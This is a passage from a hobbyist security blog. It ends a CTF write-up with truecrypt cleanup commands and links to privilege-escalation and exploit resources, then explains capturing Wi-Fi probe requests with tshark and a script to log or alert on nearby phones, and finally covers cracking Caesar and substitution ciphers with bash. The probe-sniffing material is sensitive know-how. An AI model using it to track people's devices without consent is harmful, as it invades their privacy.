<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Cleaning up after mounting the truecrypt volume with cryptsetup;<br />
<span style="color: lime;">umount /media/DAVE</span><br />
<span style="color: lime;">cryptsetup --type tcrypt close DAVETC</span><br />
<span style="color: lime;">losetup -d /dev/loop0</span><br />
We can now remove the created directory DAVE<br />
<span style="color: lime;">rm -r /media/DAVE</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cleanup_zpsykr8eefu.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cleanup_zpsykr8eefu.png" height="257" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Big up to the THS crew for the necessary keeping me going when I was hitting a wall :D<br />
<br />
and THANK YOU knightmare for the fun and games, interesting to see the truecrypt part and have learned a few new things, and have been reminded of the importance of many others :D<br />
<div>
Look forward to your next one !<br />
<br />
<br />
<br />
Recap of useful linkage;<br />
=================<br />
* Linux enumeration<br />
<a href="https://github.com/rebootuser/LinEnum" target="_blank">https://github.com/rebootuser/LinEnum</a><br />
<a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/" target="_blank">https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</a><br />
<a href="https://highon.coffee/blog/linux-local-enumeration-script/" target="_blank">https://highon.coffee/blog/linux-local-enumeration-script/</a><br />
<br />
* Drupal<br />
<a href="http://www.madirish.net/408" target="_blank">http://www.madirish.net/408</a> < drupal bruteforce v5 & v6<br />
<a href="https://www.youtube.com/watch?v=--DuAicB4pc" target="_blank">https://www.youtube.com/watch?v=--DuAicB4pc</a> < drupageddon explained<br />
<br />
* Exploits<br />
<a href="https://www.kernel-exploits.com/" target="_blank">https://www.kernel-exploits.com/</a><br />
<a href="https://www.exploit-db.com/" target="_blank">https://www.exploit-db.com/</a><br />
<br />
* Mounting truecrypt container with cryptsetup<br />
<a href="http://www.adercon.com/ac/node/114" target="_blank">http://www.adercon.com/ac/node/114</a><br />
<a href="https://tails.boum.org/doc/encryption_and_privacy/truecrypt/index.en.html" target="_blank">https://tails.boum.org/doc/encryption_and_privacy/truecrypt/index.en.html</a><br />
<div>
<br /></div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8356530514965708840.post-57623914483583627382015-05-27T23:47:00.000+02:002015-06-13T00:24:41.937+02:00Scanning for / Alerting on client probes<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Scanning for / Alerting on presence of Client Macs / ESSIDs<br />
<br />
<br />
There are a number of few great posts out there on this very subject, but hell, no harm in another one<br />
as it is an interesting subject.<br />
<br />
Basically I thought it would be cool to have some form of alert system based on mobiles so I could keep track of the coming and goings around the house.<br />
(and when the missus returns so have a few secs to hide the empties.. ;) )<br />
<br />
So what methods are there ? <br />
<br />
Well if we are talking mobiles then bluetooth & WiFi options are what you could look at.<br />
<br />
<b>BLUETOOTH</b><br />
<b>============</b><br />
ronin (JP Dunning from www.hackfromacave.com) already made a cool script called blueranger.sh which is included in KALI so anything I can think of will have to wait until I consider it to be of similar quality.. ;)<br />
<div>
The jist of it however is as follows ; </div>
Use l2ping to ping a known BADDR and then use hcitool to verify the link quality, for example ;<br />
<br />
l2ping -i hci0 -c 1 00:11:22:33:44:55 ; hcitool -i hci0 lq 00:11:22:33:44:55<br />
<br />
<br />
<b>WIFI</b><br />
<b>=====</b><br />
A way to start is to monitor the packets with probe request as these are what wifi devices are constantly broadcasting to see if they can connect to a (known or preferred) network.<br />
<br />
Packets with probe requests can be monitored with a program like wireshark or tcpdump or any other of the available packet sniffers out there that support monitor interfaces.<br />
(You will need a monitor interface to pick up the packets coming from devices not on your network)<br />
<br />
<br />
<b>Wireshark</b><br />
<b>-------------- </b><br />
Wireshark is a very well known, well supported & documented programme <br />
Start a capture in wireshark with your card in monitor mode and then use the filter ;<br />
wlan.fc.type_subtype eq 4<br />
<br />
This will list all probe requests allowing you to see the Client's MAC address and probed ESSIDs<br />
<br />
Drilling down deeper in the packet you can find more information which you may find interesting such as signal strength.<br />
<br />
A good tip on how to find out what filter is required to focus on certain information, is to drill down and find the information you want, then simply select row of interest, and then ;<br />
Right Click -> Apply as Filter -> Selected<br />
<br />
Now you will see the required filter context and the filter will be in use.<br />
Very handy to find out what the filter context is, as there are a lot...<br />
<br />
<br />
But I was more looking for something to script with, so needed a CLI variant.<br />
<br />
<b>tcpdump</b><br />
<b>------------</b><br />
If you're looking for a CLI solution for packet sniffing, then tcpdump is one of the first tools that comes to mind.<br />
<br />
Again you will need an interface in monitor mode, let's say we have a mon0 interface, then you could use the below line to sniff for packets with probe requests;<br />
<br />
<b><span style="color: lime;">tcpdump -i mon0 -e -s 256 type mgt subtype probe-req 2> /dev/null</span></b><br />
(the 2> /dev/null to avoid the standard error message)<br />
<br />
<br />
tcpdump works great, but when piping the output to a script I was having trouble with its buffering, even when using the -l switch.<br />
<div>
<br /></div>
<b>tshark</b><br />
<b>---------</b><br />
tshark is the CLI version of Wireshark and so output can be filtered using the filters which can also be used in the GUI version.<br />
<br />
<span style="color: lime;"><b>tshark -i wlan2mon -n -l subtype probereq</b></span><br />
<br />
Using the -T switch we can further choose which fields we want using filters (which can be found using the aforementioned method in wireshark's GUI.<br />
<br />
<span style="color: lime;"><b>tshark -i mon0 -n -l subtype probereq -T fields -e wlan.sa -e radiotap.dbm_antsignal -e wlan_mgt.ssid</b></span><br />
<br />
wlan.sa == source address<br />
radiotap.dbm_antsignal == rssi<br />
wlan_mgt.ssid == ESSID<br />
<br />
<br />
Now with some scripting was able to make something come to life to satisfy my curiosity :D<br />
It can (and probably will in the future) be improved in some areas, but for now it works more or less OK.<br />
<br />
Anyways, enter shee.sh, a script to either log all seen probe requests or alert on seeing known or unknown client macs depending on the options chosen.<br />
<br />
The script was written on, and intended for use on Kali Linux.<br />
<br />
Easiest to first make the script executable;<br />
<span style="color: lime;"><b>chmod +x shee.sh</b></span><br />
<br />
When running the script without any switches or with just the <span style="color: lime;"><b>-h</b></span> switch help info will be shown ;<br />
<span style="color: lime;"><b>./shee -h</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shee-05_zpsyuj4bggg.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shee-05_zpsyuj4bggg.png" height="400" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
There are input checks on the Interface (to make sure that the interface exists and is in monitor mode)</div>
<div class="separator" style="clear: both; text-align: left;">
and also on the MAC address input (to make sure that correct syntax is used)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
shee.sh requires a monitor interface to function, to check what wireless interfaces you have </div>
<div class="separator" style="clear: both; text-align: left;">
and what their status is, you can use the <span style="color: lime;"><b>-I</b></span> switch ;</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: lime;"><b>./shee.sh -I</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shee-01_zps3tkws2cl.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shee-01_zps3tkws2cl.png" height="400" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
The interface to use should be specified using the i switch.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
You can set the script up to sniff specific MAC addresses using the <span style="color: lime;"><b>-m</b></span> switch and specifying the MAC address.</div>
<div class="separator" style="clear: both; text-align: left;">
The MAC address can either be entered using colons or hyphens;</div>
<div class="separator" style="clear: both; text-align: left;">
00:11:22:33:44:55 or 00-11-22-33-44-55</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: lime;"><b>./shee.sh -i wlan4mon -m 00:11:22:33:44:55</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shee-02_zpsw6db9euz.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shee-02_zpsw6db9euz.png" height="400" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Or you can set it up to listen for a specific probed ESSID with the <span style="color: lime;"><b>-e</b></span> switch followed by the target ESSID (use quotation marks if spaces!) ;</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: lime;"><b>./shee.sh -i wlan4mon -e "Awesome Sauce"</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shee-03_zps4jgipasb.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shee-03_zps4jgipasb.png" height="400" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Or you can just set it up to simply log all clients probing about ; </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: lime;"><b>./shee.sh -i wlan4mon </b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/b733a560-e265-4dde-bc93-7380f5533b7c_zpspqkrhuwt.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/b733a560-e265-4dde-bc93-7380f5533b7c_zpspqkrhuwt.png" height="400" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
At the moment this function prints all it sees and does not (yet) only print new clients, something for me to think about ;) </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
All the 3 above scans will continue until stopped with Ctrl-C.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Including the <span style="color: lime;"><b>-s</b></span> switch will allow a sound alert to occur with each found Client for the above 3 options (if further switches are used then it is required to enter the mode) ;</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: lime;"><b>./shee.sh -i wlan4mon -M 1 -m 00:11:22:33:44:55 -s</b></span></div>
<div class="separator" style="clear: both;">
<span style="color: lime;"><b>./shee.sh -i wlan4mon -M 2 -e "Awesome Sauce" -s</b></span></div>
<div>
<div class="separator" style="clear: both;">
<span style="color: lime;"><b>./shee.sh -i wlan4mon -M 3 -s</b></span></div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I will be slowly checking the script and improving where I can, but so far it seems like a decent start to the blog after a looong period of silence... (yes kids.. babies, houses and work do that :D )</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As always, I appreciate any and all comments.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Script updated to v0.2 12-06-2015</div>
<div class="separator" style="clear: both; text-align: left;">
<b><u>Download link;</u></b></div>
<b><a href="http://www.mediafire.com/view/vz2nea6bv1hq779/shee.sh">http://www.mediafire.com/view/vz2nea6bv1hq779/shee.sh</a></b><br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Useful/Interesting blogs/posts on this</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>============================</b></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://urbanjack.wordpress.com/2013/05/25/capture-wifi-wlan-802-11-probe-request-with/">https://urbanjack.wordpress.com/2013/05/25/capture-wifi-wlan-802-11-probe-request-with/</a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://blog.rootshell.be/2012/01/12/show-me-your-ssids-ill-tell-who-you-are/">http://blog.rootshell.be/2012/01/12/show-me-your-ssids-ill-tell-who-you-are/</a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://www.securitytube.net/video/7265">http://www.securitytube.net/video/7265</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
</div>
Unknownnoreply@blogger.com8tag:blogger.com,1999:blog-8356530514965708840.post-24878350845337329052013-05-29T16:17:00.001+02:002014-08-30T15:45:38.373+02:00Cracking Substitution Ciphers<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Substitution ciphers are a frequent part of many online challenges and CTF competitions, and are always fun to have a look at.<br />
<br />
Most of these types of ciphers are fairly easy to crack with just a pencil and paper method, but there are other, quicker ways to get the job done as well.<br />
<br />
<br />
The most frequently seen letter substitution ciphers are;<br />
<br />
> <b>Caesar shift ciphers</b><br />
Shifting the letters of the alphabet up a fixed number of letters to encode / decode a given text.<br />
> <b>Substitution ciphers</b><br />
Replacing the letters of the alphabet with randomly chosen letters to encode a given text.<br />
> <b>Position dependant shift ciphers</b><br />
Replacing letters at a certain position with a shifted value and repeating that position shift cycle on each word or sentence.<br />
<br />
<br />
<b>CAESAR SHIFT CIPHERS</b><br />
<b>=====================</b><br />
These are the easiest to identify and decode.<br />
Decoding can be done by simply writing out the alphabet and identifying the shift by trial and error and testing the (expected) correct outcome.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/SHIFT_TEST_zps3ef53031.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/SHIFT_TEST_zps3ef53031.jpg" height="64" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
The most well known Caesar shift is the so-called ROT13, which can be used to both encode and decode a message by shifting the letters up 13 positions.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ROT13_zps1070e26f.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ROT13_zps1070e26f.jpg" height="82" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
ROT13 messages are easy to encode / decode with a short one-liner using 'tr' ;<br />
<span style="color: lime;">echo "This is a test, one plus one is two" | tr a-zA-Z n-za-mN-ZA-M</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/SHIFT-01_zpsbba9adbf.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/SHIFT-01_zpsbba9adbf.png" height="170" width="640" /></a><br />
<br />
<br />
This can be expanded to included digits as well (sometimes referred to as ROT18), by replacing 0-4 with 5-9 and 5-9 with 0-4 ;<br />
<span style="color: lime;">echo "this is a test, 1 + 1 = 2" | tr a-zA-Z0-45-9 n-za-mN-ZA-M5-90-4</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rot18-a_zpse67f0d1b.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rot18-a_zpse67f0d1b.png" height="134" width="640" /></a><br />
<br />
<br />
The same principle of shifting letters can be used with any number of shifts.<br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/SHIFT24_zps76baec31.jpg" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/SHIFT24_zps76baec31.jpg" height="92" width="640" /></a><br />
<br />
<br />
The easiest way to check for a Caesar shift cipher is to check all the possible shifts of a word, or sequence of words, and verify at what shift the text becomes readable.<br />
<br />
There are quite a few scripts / websites which can check and do this for you, but as a lot of them have some kind of limitation, and as I am one who enjoys re-inventing the wheel ;) I decided to have a crack at making a bash script doing the same as well.<br />
Introducing <a href="http://www.mediafire.com/download/3g8zfkj3uzwgt4t/cshift.sh" target="_blank">cshift</a><br />
<span style="color: red;"><b>Download:</b></span> <a href="http://www.mediafire.com/download/3g8zfkj3uzwgt4t/cshift.sh" target="_blank">http://www.mediafire.com/view/a9vnps7p015agpy/cshift_v0-4.sh</a><br />
<br />
Unlike many other solutions found on the interwebz, cshift allows upper and/or lower case, negative values, as well as values higher than 26 (so for instance a shift of -5 characters or of +49 characters)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-01a_zpse2928a61.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-01a_zpse2928a61.png" height="518" width="640" /></a></div>
<br />
<div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Running cshift on direct input (<i>quotes!</i>);<br />
<span style="color: lime;">./cshift.sh -i 'Jhlzhy Zhshk' -s 19</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-11a_zps9f7c5446.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-11a_zps9f7c5446.png" height="202" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Running cshift on an example text file 'test.txt' ;<br />
<span style="color: lime;">cat test</span><br />
<span style="color: lime;">./cshift -i test.txt -s 7</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-12a_zps5bcfb7bb.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-12a_zps5bcfb7bb.png" height="202" width="640" /></a><br />
<br />
<br />
<br />
<b>'Bruteforce' checking of all possibilities.</b><br />
<br />
Lets have a look at the following text (and assume it is part of an encoded text file)<br />
<i>(different shift value used, not the same as the above example)</i> ;</div>
<blockquote class="tr_bq">
<b><span style="color: yellow;">hgdlwjywaklk afvmuw sfykl</span></b></blockquote>
Using cshift's <b>-b</b> switch for the 'bruteforce' function, we can check all the possible shifts and see which shift gives a readable outcome (this is best done on a short sequence of words, to be able to correctly ascertain shift values).<br />
<br />
<span style="color: lime;">./cshift.sh -i 'hgdlwjywaklk afvmuw sfykl' -b</span><br />
(dont like colours ? add the -c switch; <span style="color: lime;">./cshift.sh -i 'hgdlwjywaklk afvmuw sfykl' -bc</span>)<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-02a_zps22edb690.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-02a_zps22edb690.png" height="518" width="640" /></a><br />
<br />
<br />
For possibly less well known words (or if the above colours have half blinded you preventing recognition of readable text..), this can be further simplified, by using cshift's <b>-w</b> switch which allows the the bruteforce output to be checked against a given dictionary or wordlist (use a small wordlist! its slow..).<br />
In this case I have chosen to check against the <a href="http://cfaj.freeshell.org/wf/UKACD17.shtml" target="_blank">UKACD</a> list, which is a small wordlist for crossword puzzles etc.<br />
<br />
For correct results this test should be done on a <b><u>single long word</u></b> (this also helps avoid false positives).<br />
<span style="color: lime;">./cshift.sh -i 'hgdlwjywaklk' -b -w ukacd.txt</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-03a_zpsa1bab2c8.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cshift-03a_zpsa1bab2c8.png" height="568" width="640" /></a><br />
<br />
<br />
So with either just the 'bruteforce' <b>-b</b> switch or together with the <b>-w</b> switch we can see that a shift of 8 letters gives readable text and can use that value to decode the full text / text file.<br />
<br />
<br />
<br />
<b>SUBSTITUTION CIPHERS</b><br />
<b>======================</b><br />
These are slightly harder depending on the amount of text given to work with.<br />
The less text you have to work with, the harder it is.<br />
<br />
Given a substantial amount of text, you can run a letter frequency analysis on the text and check the most frequent letters to create a starting point.<br />
From there it is a matter of a decent vocabulary combined with some trial and error.<br />
<br />
When looking at a text encoded with a substitution cipher, it is handy to take note of few things (based on text being in English);<br />
<ul style="text-align: left;">
<li>The letter 'E' is the most frequent letter in English, so it stands to reason that the most frequent letter in the encoded text could stand for an 'E'.</li>
<li>The letter 'T' is the 2nd most frequent letter in English.</li>
<li>Look for single character words; in an English text single letter words will be either 'A' or 'I'.</li>
<li>The word 'the' is the most frequent 3-character word used in English, it is also the most frequently used word in general in English.</li>
</ul>
Using the above, you can usually create a solid starting point and work forward from there.<br />
<br />
Some helpful information on letter and word frequencies in English can be found here;<br />
<a href="http://scottbryce.com/cryptograms/stats.htm">http://scottbryce.com/cryptograms/stats.htm</a><br />
<br />
<br />
Let's have a look at a test file '<a href="http://www.mediafire.com/download/xarxaodj7000ldc/manifesto.txt" target="_blank">manifesto.txt</a>'<br />
<br />
Using the <b>-f</b> switch in cshift we can do a rudimentary letter frequency analysis on the above text file;<br />
<span style="color: lime;">./cshift.sh -i manifesto.txt -f</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/subs-01_zpsf28c723b.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/subs-01_zpsf28c723b.png" height="546" width="640" /></a><br />
<br />
<br />
Now we have the letter analysis on the whole file, lets cut out the first few lines and work on those for a bit ;<br />
<span style="color: lime;">head -n 25 manifesto.txt > new.txt</span><br />
<span style="color: lime;">cat new.txt</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/subs-01a_zps069eaeb5.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/subs-01a_zps069eaeb5.png" height="450" width="640" /></a><br />
<br />
<br />
From the previous letter frequency analysis it looks most likely that ;<br />
K = E<br />
A = T<br />
<br />
We see that there are single letter words in use u & w<br />
So, either ;<br />
U = A & W = I or U = I & W = A<br />
From the use of apostrophes noted in the text following U, it seems that U == I & W = A<br />
<br />
I use a simple replacement/substitution script using 'sed' with lines written out line by line to make it easier to check and alter as needed.<br />
To make it 'easier' to read I lower case all letters in the text and put substitutions in upper case, then keep on running it on the text file with expected substitutions until words start appearing.<br />
<blockquote class="tr_bq">
<span style="color: yellow;">#!/bin/bash</span><br />
<span style="color: yellow;">#replace.sh</span><br />
<span style="color: yellow;">cat $1 | tr '[:upper:]' '[:lower:]' | sed \</span><br />
<span style="color: yellow;">-e 's/a/a/g' \</span><br />
<span style="color: yellow;">-e 's/b/b/g' \</span><br />
<span style="color: yellow;">-e 's/c/c/g' \</span><br />
<span style="color: yellow;">-e 's/d/d/g' \</span><br />
<span style="color: yellow;">-e 's/e/e/g' \</span><br />
<span style="color: yellow;">-e 's/f/f/g' \</span><br />
<span style="color: yellow;">-e 's/g/g/g' \</span><br />
<span style="color: yellow;">-e 's/h/h/g' \</span><br />
<span style="color: yellow;">-e 's/i/i/g' \</span><br />
<span style="color: yellow;">-e 's/j/j/g' \</span><br />
<span style="color: yellow;">-e 's/k/k/g' \</span><br />
<span style="color: yellow;">-e 's/l/l/g' \</span><br />
<span style="color: yellow;">-e 's/m/m/g' \</span><br />
<span style="color: yellow;">-e 's/n/n/g' \</span><br />
<span style="color: yellow;">-e 's/o/o/g' \</span><br />
<span style="color: yellow;">-e 's/p/p/g' \</span><br />
<span style="color: yellow;">-e 's/q/q/g' \</span><br />
<span style="color: yellow;">-e 's/r/r/g' \</span><br />
<span style="color: yellow;">-e 's/s/s/g' \</span><br />
<span style="color: yellow;">-e 's/t/t/g' \</span><br />
<span style="color: yellow;">-e 's/u/u/g' \</span><br />
<span style="color: yellow;">-e 's/v/v/g' \</span><br />
<span style="color: yellow;">-e 's/w/w/g' \</span><br />
<span style="color: yellow;">-e 's/x/x/g' \</span><br />
<span style="color: yellow;">-e 's/y/y/g' \</span><br />
<span style="color: yellow;">-e 's/z/z/g'</span><br />
<span style="color: yellow;">echo</span><br />
<span style="color: yellow;">exit 0</span></blockquote>
<i>(This actually also included in cshift with the -r switch,[<span style="color: lime;">./cshift -i input.file -r</span>] but not practical as using it means continuous editing of the script in nano and possibly risking fubarring the whole script ;) use with care !) </i><br />
<br />
Let's enter the aforementioned probable substitutions in the replace.sh script and check the outcome.<br />
<span style="color: lime;">./replace.sh new.txt</span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/comb-01_zps871b7efa.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/comb-01_zps871b7efa.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
From that outcome it becomes clear that ;<br />
X = H<br />
And also following the use of apostrophes we can deduce that ;<br />
N = S<br />
<br />
After entering the above and re-running the script, from the part of text that is (semi-)readable we can further deduce that ;<br />
D=N<br />
M=M<br />
And with a calculated guess (based on thinking of the word TEACH) try T = C<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
after entering the above substitutions and running script again ;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/comb-02_zps528bf8df.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/comb-02_zps528bf8df.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now you are already well on your way in just a couple of steps.<br />
<br />
Going through the text carefully, you will find that ;<br />
R = K<br />
S = R<br />
L = D<br />
Y = Y<br />
O = L<br />
<br />
Entering those values in the script and running it ;<br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/comb-03_zpsbe5f3447.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/comb-03_zpsbe5f3447.png" /></a><br />
<br />
Now its easy to identify the other letters and solve the text ;<br />
q = F<br />
v = B<br />
f = W<br />
p = O<br />
c = G<br />
i = U<br />
j = V<br />
e = P<br />
g = J<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/comb-04_zps0b3a6342.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/comb-04_zps0b3a6342.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="color: cyan;">Now to show you how to make it even easier ;)</span><br />
<br />
<b>lightningmanic</b> shared a great frequency_analysis java script on the <a href="http://top-hat-sec.com/forum/index.php?topic=2997.0" target="_blank">THS forums</a>, including excellent explanations on substitution ciphers and the decoding of same.<br />
This java script does a much better job than my attempts with the above bash scripts and should definitely be in your toolbox if you enjoy this kind of thing.<br />
Download FreqA ;<br />
<a href="http://www.mediafire.com/download/y1f6pjbyae3xkjb/FreqA.zip">http://www.mediafire.com/download/y1f6pjbyae3xkjb/FreqA.zip</a><br />
<br />
<br />
Check the FreqA.zip file contents and then unzip ;<br />
<span style="color: lime;">unzip -l FreqA.zip</span><br />
<span style="color: lime;">unzip FreqA.zip</span><br />
